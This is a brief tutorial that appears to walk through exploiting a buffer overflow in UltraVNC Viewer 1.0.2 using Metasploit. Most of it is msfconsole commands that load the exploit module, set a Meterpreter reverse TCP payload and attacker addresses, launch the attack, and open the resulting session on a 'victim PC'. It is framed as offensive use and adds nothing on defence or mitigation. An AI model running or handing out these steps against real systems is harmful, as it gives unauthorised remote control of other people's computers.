This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.
Exploit Targets
0 - Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/windows/vnc/ultravnc_bof
Msf exploit (ultravnc_bof)>Set payload windows/meterpreter/reverse_tcp
Msf exploit (ultravnc_bof)>Set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ultravnc_bof)>Set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (ultravnc_bof)>exploit
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
